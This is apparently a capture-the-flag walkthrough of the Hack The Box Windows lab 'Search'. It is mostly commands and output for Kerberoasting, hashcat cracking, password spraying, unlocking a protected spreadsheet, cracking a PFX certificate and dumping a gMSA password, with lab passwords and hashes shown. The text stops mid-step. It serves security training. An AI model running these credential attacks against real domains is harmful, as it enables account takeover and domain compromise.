Hack-The-Box-walkthrough[search]

introduce

OS: Windows
Difficulty: Hard
Points: 40
Release: 18 Dec 2021
IP: 10.10.11.129

  • my htb rank

Enumeration

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.129
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 16:21:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft IIS httpd 10.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
8172/tcp open ssl/http Microsoft IIS httpd 10.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49691/tcp open unknown
49704/tcp open msrpc Microsoft Windows RPC
49725/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Nmap reveals a lot of open ports, most of them are Windows based ports. Add the domain to hosts file. Let’s look into web first.

Nothing much available on the web other than team members name. Let’s add these name to a file and enumerate valid usernames.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/kerbrute-master/kerbrute userenum user.txt -d search.htb --dc search.htb

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 01/07/22 - Ronnie Flathers @ropnop

2022/01/07 11:31:26 > Using KDC(s):
2022/01/07 11:31:26 > search.htb:88

2022/01/07 11:31:26 > [+] VALID USERNAME: Dax.Santiago@search.htb
2022/01/07 11:31:26 > [+] VALID USERNAME: Keely.Lyons@search.htb
2022/01/07 11:31:26 > [+] VALID USERNAME: Sierra.Frye@search.htb
2022/01/07 11:31:26 > Done! Tested 8 usernames (3 valid) in 0.235 seconds

Out of eight users only three are valid. Let’s Try to query the domain for users with ‘Do not require Kerberos pre-authentication’ set and export their TGTs for cracking.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetNPUsers.py search.htb/ -usersfile user.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

[-] User Keely.Lyons@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Dax.Santiago@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye@search.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

These accounts have not set to ‘Do not require pre-auth’. This means, we can’t perform Kerberoasting attack, it requires a user with Pre-Authentication enabled. We can’t dump LDAP without a valid password of a user. There’s no any interesting directory’s to look into. However, there’s a image which has interesting information.

1
http://search.htb/images/slide_2.jpg

If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and password is mentioned IsolationIsKey? We have username and password of Hope user. We can perform password spaying on recently found accounts too.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p 'IsolationIsKey?' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Keely.Lyons@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Dax.Santiago@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Sierra.Frye@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Kyla.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Kaiara.Spencer@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Dave.Simpson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Ben.Thompson@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Chris.Stewart@search.htb:IsolationIsKey? STATUS_LOGON_FAILURE

As you can see, this password is not valid for any of the user which we found recently. Let’s try this password with Hope user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares
SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default share
SMB 10.10.11.129 445 RESEARCH CertEnroll READ Active Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk
SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server share
SMB 10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
SMB 10.10.11.129 445 RESEARCH SYSVOL READ Logon server share

We have access to couple shared directory’s. Let’s look into them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password:
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Fri Jan 7 11:46:39 2022
.. Dc 0 Fri Jan 7 11:46:39 2022
abril.suarez Dc 0 Tue Apr 7 14:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 09:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 08:35:32 2020
belen.compton Dc 0 Tue Apr 7 14:32:31 2020
Cameron.Melendez Dc 0 Fri Jul 31 08:37:36 2020
chanel.bell Dc 0 Tue Apr 7 14:15:09 2020
Claudia.Pugh Dc 0 Fri Jul 31 09:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 08:02:04 2020
dax.santiago Dc 0 Tue Apr 7 14:20:08 2020
Eddie.Stevens Dc 0 Fri Jul 31 07:55:34 2020
edgar.jacobs Dc 0 Thu Apr 9 16:04:11 2020
Edith.Walls Dc 0 Fri Jul 31 08:39:50 2020
eve.galvan Dc 0 Tue Apr 7 14:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 14:29:22 2020
hope.sharp Dc 0 Thu Apr 9 10:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 14:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 09:01:06 2020
payton.harmon Dc 0 Thu Apr 9 16:11:39 2020
Reginald.Morton Dc 0 Fri Jul 31 07:44:32 2020
santino.benjamin Dc 0 Tue Apr 7 14:10:25 2020
Savanah.Velazquez Dc 0 Fri Jul 31 08:21:42 2020
sierra.frye Dc 0 Wed Nov 17 20:01:46 2021
trace.ryan Dc 0 Thu Apr 9 16:14:26 2020

3246079 blocks of size 4096. 458738 blocks available
smb: \>

More user information is present in this directory. Let’s add these to user.txt file. We can access Hope users directory, but for the rest we don’t have permission to read or list the contents.

Now we have a valid username and password, we can dump LDAP.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All 1 ⨯
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Windows-100.search.htb
INFO: Querying computer: Windows-99.search.htb
INFO: Querying computer: Windows-98.search.htb
INFO: Querying computer: Windows-97.search.htb
INFO: Querying computer: Windows-96.search.htb
INFO: Querying computer: Windows-95.search.htb
INFO: Querying computer: Windows-94.search.htb
INFO: Querying computer: Windows-93.search.htb
INFO: Querying computer: Windows-92.search.htb
INFO: Querying computer: Windows-91.search.htb
----------SNIP----------

We have a vhost, let’s add that to host file. Now we can use this dump to visualize it using bloodhound GUI. Upload all the dumped data.

This is the shortest path to domain admin. However, we don’t have access to any of the user who are member of ‘ITSEC’. We have access to ‘Hope Sharp’ user but she’s not a member of ITSEC. However, if we look for Kerberoastable Accounts, then we’d find two.

This ‘Web_svc’ account is created by HelpDesk and it is temporary. It is being used as Web Service, so basically it is a service account.

The SPN is not null, so we can Kerberoast to extract service account credentials (hash) from Active Directory as a regular user without sending any packets to the target system.

  • Kerberoasting without SPNs

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>



$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$01dd7ba8711fd95bdc8360787582d5a4ca21ab2292505d3a3d00343015008eaf0fc7b2151f58f0b91f4f5fc5b18aaae33a5181e98b15951f8fdfa5df0dde76d1f8821b72e0e321993ec8cc7ceed84ac1ec33f85693ef3c204cef1e0dc14221ca3e0308262fb8634e268c56d9ddc44b5368038fed232e669772dc1748a8400e8181c61f065e773a5d5cf37fd036934f6ac77904eb62b1d6ea68f4f86c609053298fb64979293e709f00bf7fe42b2d77c327fc2180c7aec3a01134a1daee99b4134be38879805f576ad0d02818c3e8838720cef5e42f442ea13d6426f47a38c9ad40c106faceae7e20c9773e87870ab4f470da4f3911a1ca476e9e874fa0afcf2395e419db524a69c6013ec760dcc357fdfad8158205d5bce95f1ca6949e53a1be01d168fb23f36c12da34292310054e78a4f85b0291edc28396e01793d79f61edfb66cf95fb91d5fe001062fbf164ddfca6e967edf6b62052055f9fc15205d37437f6689f97fb5de7ec1cf50c71220d60425ed596d95de7583e4650eb401d08020532d1453baf3cfd8a20d8dc1dea9559ad1e9340199160163ada904dcff8a93ffe405e4773bfdd63aa54fee3fe75dda48c4be602b1d519292b3f8525d06f81dced00161c984b2865709f31cee9f7f6cb8eaf4578f98acb594367a1a75ae3ce1e7c30694870c3846ca4a28688863aafb96ebf80c035c6f903ebc29922440b3cbd933d2ffa8cdcb832b15bc65e17f33b03a9e39344face26222797e4858765bb822013822c7b0c16aceb0c69e5d1449561860660aee435e03c25e4e1e56489c5b1c31b159a043e67c10ebade504314ab4a92e6cfaf84265b05b6becf91a9609f67f318b3ca2f5b8bbe48c5c1ee2d2ee5d76808af85711768f70cc6fa44a52709f09a6bf66a1cb0eaaa7a2557d170da2e3f93af61bfe03b4823642f5856fe1f903879dde38e1673412e7acd44feb7b6d56baf2c619344cd255a6211e93997990cc5d9590cba762c818e177cab3e863fb606ef3a59b01cae79245ce48f4adfcb8a2191fdc50e22e0efcbc6f1a32b7d9e01e45a084bc28d16dce196c4764bbb69923a74f74a7979359a4027e4f7b3a6035308b41d35779290c63af219520061a8d135445b4627f6d653dfc782e58f8be41319daff7d11839be8b1cf00d45d2f2edaf38688e88d3e87db5e256ed3af5c00e819e6e17fc68310de406de59271c646279a5c3f300fc85cd514f7840c560a82bb47ead06bc80f031816c7c612058143a83e53bd1826856177bbd53484f9f70a861ad4f3544b2699ee9017e06377f132db59f83e1715b8c7d3b71ecd92e388ce358fa6602c2591d3feff427b7b4c072c0d6d41ef9c0a150ae100a064267a98dc9a3325a33b2b8881a926b8ab88076527e54c153440a51efcaffc1e230e7eebe7259e3d7d826a4eb061a8e2d8a53459fada32331caf5f21a9dd80669e0b88ca9966bd04425ec2e1

We got the hash of Web_svc service account. Let’s try to crack it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
hashcat.exe -m 13100 password.txt rockyou.txt

$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$4ee5fdd7f42a0f84f9ac17f136b3f069$01dd7ba8711fd95bdc8360787582d5a4ca21ab2292505d3a3d00343015008eaf0fc7b2151f58f0b91f4f5fc5b18aaae33a5181e98b15951f8fdfa5df0dde76d1f8821b72e0e321993ec8cc7ceed84ac1ec33f85693ef3c204cef1e0dc14221ca3e0308262fb8634e268c56d9ddc44b5368038fed232e669772dc1748a8400e8181c61f065e773a5d5cf37fd036934f6ac77904eb62b1d6ea68f4f86c609053298fb64979293e709f00bf7fe42b2d77c327fc2180c7aec3a01134a1daee99b4134be38879805f576ad0d02818c3e8838720cef5e42f442ea13d6426f47a38c9ad40c106faceae7e20c9773e87870ab4f470da4f3911a1ca476e9e874fa0afcf2395e419db524a69c6013ec760dcc357fdfad8158205d5bce95f1ca6949e53a1be01d168fb23f36c12da34292310054e78a4f85b0291edc28396e01793d79f61edfb66cf95fb91d5fe001062fbf164ddfca6e967edf6b62052055f9fc15205d37437f6689f97fb5de7ec1cf50c71220d60425ed596d95de7583e4650eb401d08020532d1453baf3cfd8a20d8dc1dea9559ad1e9340199160163ada904dcff8a93ffe405e4773bfdd63aa54fee3fe75dda48c4be602b1d519292b3f8525d06f81dced00161c984b2865709f31cee9f7f6cb8eaf4578f98acb594367a1a75ae3ce1e7c30694870c3846ca4a28688863aafb96ebf80c035c6f903ebc29922440b3cbd933d2ffa8cdcb832b15bc65e17f33b03a9e39344face26222797e4858765bb822013822c7b0c16aceb0c69e5d1449561860660aee435e03c25e4e1e56489c5b1c31b159a043e67c10ebade504314ab4a92e6cfaf84265b05b6becf91a9609f67f318b3ca2f5b8bbe48c5c1ee2d2ee5d76808af85711768f70cc6fa44a52709f09a6bf66a1cb0eaaa7a2557d170da2e3f93af61bfe03b4823642f5856fe1f903879dde38e1673412e7acd44feb7b6d56baf2c619344cd255a6211e93997990cc5d9590cba762c818e177cab3e863fb606ef3a59b01cae79245ce48f4adfcb8a2191fdc50e22e0efcbc6f1a32b7d9e01e45a084bc28d16dce196c4764bbb69923a74f74a7979359a4027e4f7b3a6035308b41d35779290c63af219520061a8d135445b4627f6d653dfc782e58f8be41319daff7d11839be8b1cf00d45d2f2edaf38688e88d3e87db5e256ed3af5c00e819e6e17fc68310de406de59271c646279a5c3f300fc85cd514f7840c560a82bb47ead06bc80f031816c7c612058143a83e53bd1826856177bbd53484f9f70a861ad4f3544b2699ee9017e06377f132db59f83e1715b8c7d3b71ecd92e388ce358fa6602c2591d3feff427b7b4c072c0d6d41ef9c0a150ae100a064267a98dc9a3325a33b2b8881a926b8ab88076527e54c153440a51efcaffc1e230e7eebe7259e3d7d826a4eb061a8e2d8a53459fada32331caf5f21a9dd80669e0b88ca9966bd04425ec2e1:@3ONEmillionbaby

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*...5ec2e1
Time.Started.....: Sat Jan 08 02:00:20 2022 (1 sec)
Time.Estimated...: Sat Jan 08 02:00:21 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 14880.9 kH/s (9.10ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Speed.#3.........: 271.1 kH/s (13.03ms) @ Accel:32 Loops:1 Thr:8 Vec:1
Speed.#*.........: 15152.0 kH/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12828672/14344385 (89.43%)
Rejected.........: 0/12828672 (0.00%)
Restore.Point....: 11214848/14344385 (78.18%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: DR3KSILL0 -> 23~1~19
Candidates.#3....: 2380146112071401 -> 234tjg
Hardware.Mon.#1..: Temp: 59c Util: 29% Core: 528MHz Mem:2279MHz Bus:8
Hardware.Mon.#3..: N/A

Started: Sat Jan 08 01:59:54 2022
Stopped: Sat Jan 08 02:00:22 2022

We got the password for web_svc service account, let’s spray this password across all the accounts which we have found so far.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# crackmapexec smb search.htb -u user.txt -p '@3ONEmillionbaby' --continue-on-success
SMB 10.10.11.129 445 RESEARCH [*] Windows 10.0 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Edith.Walls:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\eve.galvan:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\hope.sharp:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\sierra.frye:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [-] search.htb\trace.ryan:@3ONEmillionbaby STATUS_LOGON_FAILURE

One user account is using the same password as service account. Let’s look into shares of that user.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password:
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 Mon Aug 10 06:02:16 2020
.. DRc 0 Mon Aug 10 06:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr 9 16:05:29 2020
desktop.ini AHSc 282 Mon Aug 10 06:02:16 2020
Microsoft Edge.lnk Ac 1450 Thu Apr 9 16:05:03 2020
Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 06:35:44 2020

3246079 blocks of size 4096. 458449 blocks available

There’s a XLS file, download that to your machine.

This XLS document has two sheets, one of them has captured passwords of phishing and another has a list of username. As you can see the lock symbol on second sheet, a column is being locked with a password.

You can confirm it by resizing the cell which is in between lastname and Username. There are two ways to remove the password. Upload it on google drive and access it via sheets, it will remove the password for you. This is the easiest way. If you want to remove it manually, then you need unzip this xlsx file and delete the below link from the sheet2.xml file.

1
2
3
<sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg"
saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>

You can find this ‘sheet2.xml’ file after unzipping the xlsx file.
Location: xl/worksheets/sheet2.xml Once you delete that line, you need to zip it back.

1
zip -r Phishing.xls .

Open the xls file and double click on the line which is between D and B to see the passwords.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
firstname	lastname	password	Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton

Now we have 15 more username & passwords. If we look at the bloodhound visual path to domain admin, out of all the users, there are only two are in the password list. Abby and Sierra will lead to domain admin. The Abby password didn’t work, but Sierra’s did.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password:
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
. DRc 0 Wed Nov 17 20:08:00 2021
.. DRc 0 Wed Nov 17 20:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr 7 14:03:59 2020
desktop.ini AHSc 282 Fri Jul 31 10:42:15 2020
Microsoft Edge.lnk Ac 1450 Tue Apr 7 08:28:05 2020
user.txt Ac 33 Wed Nov 17 19:55:27 2021

3246079 blocks of size 4096. 458293 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat user.txt
5c7b277e24c9c5a866f572bdff53f0f4

We have user flag now.

1
2
3
4
5
6
7
8
smb: \sierra.frye\Desktop\> cd \sierra.frye\Downloads\Backups\
smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 16:39:17 2020
.. DHc 0 Mon Aug 10 16:39:17 2020
search-RESEARCH-CA.p12 Ac 2643 Fri Jul 31 11:04:11 2020
staff.pfx Ac 4326 Mon Aug 10 16:39:17 2020

3246079 blocks of size 4096. 458293 blocks available

Under Downloads we will find Cryptography files. Let’s download them to our machine.

1
2
3
4
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
getting file \sierra.frye\Downloads\Backups\search-RESEARCH-CA.p12 of size 2643 as search-RESEARCH-CA.p12 (1.7 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
getting file \sierra.frye\Downloads\Backups\staff.pfx of size 4326 as staff.pfx (5.6 KiloBytes/sec) (average 2.2 KiloBytes/sec)

A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography Standard #12) encryption. It is used as a portable format for transferring personal private keys and other sensitive information. P12 files are used by various security and encryption programs. It is generally referred to as a “PFX file”.

We can try to upload this certificate to browser (firefox).

It asks for the password. We can try to crack the password using bellow tool.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# /root/p12tool/p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt

██████╗ ██╗██████╗ ████████╗ ██████╗ ██████╗ ██╗
██╔══██╗███║╚════██╗╚══██╔══╝██╔═══██╗██╔═══██╗██║
██████╔╝╚██║ █████╔╝ ██║ ██║ ██║██║ ██║██║
██╔═══╝ ██║██╔═══╝ ██║ ██║ ██║██║ ██║██║
██║ ██║███████╗ ██║ ╚██████╔╝╚██████╔╝███████╗
╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝

Version: 1.0 (n/a) - 01/07/22 - Evi1cg

2022/01/07 15:42:12 -> [*] Brute forcing...
2022/01/07 15:42:12 -> [*] Start thread num 100
2022/01/07 15:42:12 -> [+] Password found ==> misspissy
2022/01/07 15:42:12 -> [*] Successfully cracked password after 5484391 attempts!

If you are on VM then it’d take much more time. Now we have the password for the certificate. Let’s add it in our browser.

There’s a specific endpoint which you can access with this certificate.

1
https://search.htb/staff/en-US/logon.aspx

Now we need to input the credentials of ‘Sierra’ user and access PowerShell Console.

1
2
3
Sierra.Frye
$$49=wide=STRAIGHT=jordan=28$$18
research.search.htb

After login we can run Powershell commands.

Let’s go back to bloodhound and look for path from owned principle to domain admin.

As we are member of ITSEC, we can read GMSA password.

BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/search]
└─# python3 /root/gMSADumper-main/gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.

  • Reading GMSA Password

  • Passwordless PowerShell - How to use gMSAs In Your Scripts

  • GMSA Attributes in the Active Directory

msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
msds-ManagedPassword - This attribute contains a BLOB with password information for group-managed service accounts.
msDS-ManagedPasswordId - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
msDS-ManagedPasswordInterval - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.

Based on these both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access domain admin

1
2
3
4
5
$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
